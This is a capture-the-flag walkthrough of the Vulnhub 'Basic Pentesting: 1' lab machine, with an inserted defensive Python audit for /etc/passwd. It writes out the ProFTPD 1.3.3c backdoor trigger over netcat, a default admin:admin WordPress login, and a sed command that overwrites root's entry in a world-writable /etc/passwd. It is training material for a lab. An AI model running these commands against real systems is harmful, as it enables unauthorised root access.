CTF Walkthrough - Basic Pentesting: 1
Information
- Difficulty: ★☆☆☆☆
- Fun: ★☆☆☆☆
- URL: Vulnhub
- Author: Josiah Pierce
- Goal: Get root privileges
Intro
According to the Vulnhub description, this machine is intended for newcomers. It has different ways to reach the goal (rooting the machine). The machine is pretty realistic (I have found similar scenarios on real-life pentests), which makes it… Well, not amusing. But still, it’s nice for beginners to practice!
Walkthrough
Identification and Enumeration
The first thing to do is identify the target IP. Luckily it answers to ping requests, so a simple fping will do:
root@kali:~# fping -aqg 192.168.10.0/24
[...]
192.168.10.195
After some seconds, fping spits out a handful of IPs. The only unknown address in that list is 192.168.10.195, which should be my new guest, and my target IP.
Then, as always, nmap is used to get all of the information about the services running on the machine.
nmap -sT -p- -A -vvv -oA nmap 192.168.10.195
[...]
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ProFTPD 1.3.3c
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
FTP
The first thing to notice is that ProFTPD 1.3.3c is a backdoored version (found using searchsploit). The package distribution was compromised by an attacker, who distributed a trojaned version of the software. Not cool! The full compromise report can be found here.
Luckily for us, we don’t need to defend the machine, but attack it. Of course, this backdoor is completely documented, and we can make use of it. The manual PoC is really simple (the full information may be found here), so let’s try it:
root@kali:~# nc 192.168.10.195 21
220 ProFTPD 1.3.3c Server (vtcsec) [192.168.10.195]
HELP ACIDBITCHEZ
id;
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
That was fast, root in a few minutes. But this machine isn’t over!
Of course, we can also make use of this backdoor using Metasploit, which saves us the need to search for the manual PoC. Given my environment, the default Metasploit payload for this case (cmd/unix/reverse on port 4444) works for me, so this is also a super easy job:
FTP successfully completed!
HTTP
Now this is where this machine starts to get interesting. nmap detects an Apache on port 80, let’s see:
Well, not too impressive. Maybe there’s something else on the web server…
root@kali:~# dirb 'http://192.168.10.195'
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Apr 8 22:38:47 2018
URL_BASE: http://192.168.10.195/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.10.195/ ----
+ http://192.168.10.195/index.html (CODE:200|SIZE:177)
==> DIRECTORY: http://192.168.10.195/secret/
[...]
A secret directory, that’s better. This path contains a WordPress blog, with the default “Hello world!” post. Maybe the administration login panel is found at the default location, wp-login?
It is! However, something important happened. The URL is not an IP anymore: the browser followed a redirection to http://vtsec/secret/wp-login. In my network, I don’t need to make further adjustments, as my DNS/DHCP server handles the situation correctly and resolves the hostname of the VM to the actual IP. When this isn’t the case, a new entry in /etc/hosts should be added so the web application works correctly.
Of course, the first thing to try here is the classical h4x0r technique: login with admin:admin. And it works!
Now, as the admin username has actual administration privileges, the easiest thing to do is to use a Metasploit module to make use of these permissions and get code execution on the server:
We have a shell with limited permissions (user www-data), so we need to find a way to escalate privileges on the machine. First of all, let’s retrieve /etc/passwd, just in case:
www-data@vtcsec:$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
[... system users ...]
marlinspike:x:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash
[... more system users ...]
There is a single non-system user (besides root), marlinspike. I’ll make a note of it, just in case.
Something else should be noted here. These are the permissions of the file /etc/passwd:
www-data@vtcsec:$ ls -lah /etc/passwd
-rw-rw-rw- 1 root root 2.4K Nov 16 13:02 /etc/passwd
The file is world-writable! Usually, UNIX systems divide the user login information into two files:
- /etc/passwd: Stores username, encrypted/hashed password, user and group ID, comment, home directory, and command interpreter. If the password field is x, then the hashed password is stored in /etc/shadow. World-readable, but not usually world-writable (permissions 644, owner root). More info: man 5 passwd.
- /etc/shadow: Used to store password information. Stores username, encrypted/hashed password, and other account validity data (password age, last change date, account expiration date…). Only readable by root (permissions 600, owner root). More info: man 5 shadow.
So, if we can write to /etc/passwd, it means we can set the password for any user, even if it has previously been set in /etc/shadow. Even the root user!
First of all, we need to generate a password hash (using a salt):
root@kali:~# mkpasswd -5 delicious oatmeals
$1$oatmeals$zt2BfPPpVxqgikzNDxQRb1
Then, we change the root entry, so the x in the password field is replaced by our delicious hashed password:
www-data@vtcsec:$ cat /etc/passwd | sed 's/root:x/root:$1$oatmeals$zt2BfPPpVxqgikzNDxQRb1/' > /etc/passwd
www-data@vtcsec:$ cat /etc/passwd
root:$1$oatmeals$zt2BfPPpVxqgikzNDxQRb1:0:0:root:/root:/bin/bash
[... more users ...]
And then…
We got root!
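The two conditions this privilege escalation relies on (a writable /etc/passwd and a hash placed directly in the password field instead of the x that defers to /etc/shadow) are exactly what a defender should be auditing for. The following is an added example, not code from the original post: a small Python audit that parses a passwd file and flags world- or group-writable mode bits, entries carrying a hash in the password field, extra UID 0 accounts, and interactive non-system users. The file content and the 0o666 mode are constructed to mirror what the walkthrough shows; audit_file is the same check run against a live system.

```python
"""Audit /etc/passwd for the weaknesses used in the walkthrough.

Added example (not part of the original post). SAMPLE_PASSWD and SAMPLE_MODE are
constructed to mirror the entries and the -rw-rw-rw- mode shown above.
"""
import os
import stat
from dataclasses import dataclass

# Constructed sample mirroring the post's /etc/passwd after the root entry was modified
SAMPLE_PASSWD = """root:$1$oatmeals$zt2BfPPpVxqgikzNDxQRb1:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
marlinspike:x:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash
"""

# Constructed mode bits matching "-rw-rw-rw- 1 root root" from the post
SAMPLE_MODE = 0o666


@dataclass
class PasswdEntry:
    name: str
    password: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text):
    """Parse passwd(5) formatted text into PasswdEntry records (7 colon-separated fields)."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, password, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, password, int(uid), int(gid), gecos, home, shell))
    return entries


def audit_passwd(text, mode, uid_min=1000):
    """Return findings for a passwd file's content and its st_mode.

    hash_in_passwd: accounts whose password field is neither the shadow marker "x"
                    nor a locked marker ("*" / "!"), i.e. a hash lives in passwd itself.
    extra_uid0:     accounts other than root with UID 0.
    empty_password: accounts with an empty password field (passwordless login).
    login_users:    non-system accounts (uid >= uid_min) with an interactive shell.
    """
    findings = {
        "world_writable": bool(mode & stat.S_IWOTH),
        "group_writable": bool(mode & stat.S_IWGRP),
        "hash_in_passwd": [],
        "extra_uid0": [],
        "empty_password": [],
        "login_users": [],
    }
    for e in parse_passwd(text):
        if e.password == "":
            findings["empty_password"].append(e.name)
        elif e.password != "x" and not e.password.startswith(("*", "!")):
            findings["hash_in_passwd"].append(e.name)
        if e.uid == 0 and e.name != "root":
            findings["extra_uid0"].append(e.name)
        if e.uid >= uid_min and not e.shell.endswith(("nologin", "false")):
            findings["login_users"].append(e.name)
    return findings


def audit_file(path="/etc/passwd"):
    """Run the audit against a real file, taking the mode from the filesystem."""
    with open(path) as fh:
        text = fh.read()
    return audit_passwd(text, os.stat(path).st_mode)


if __name__ == "__main__":
    for key, value in audit_passwd(SAMPLE_PASSWD, SAMPLE_MODE).items():
        print(f"{key}: {value}")
```

On the constructed sample the audit reports the file as world-writable, root as the account with a hash in the password field, and marlinspike as the only interactive non-system user, which is the same information the walkthrough gathered by hand. A clean Ubuntu host should return world_writable False and an empty hash_in_passwd list; anything else is worth an alert.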
SSH
There is one more service running on the machine: SSH. However, the installed version does not appear vulnerable.
We made note of an existing user, though. And since password login is enabled, there is no need to find a private key. What if…
Bingo!
The privilege escalation process would be exactly the same, as the user marlinspike can also write to /etc/passwd.
Final words
As its name suggests, this is a basic boot2root machine intended for beginner practice. It shows different ways to get into a vulnerable machine, which may be useful for your day-to-day pentesting operations. For more advanced pentesters, this is not the funniest machine to pwn.
All done here, have a nice day!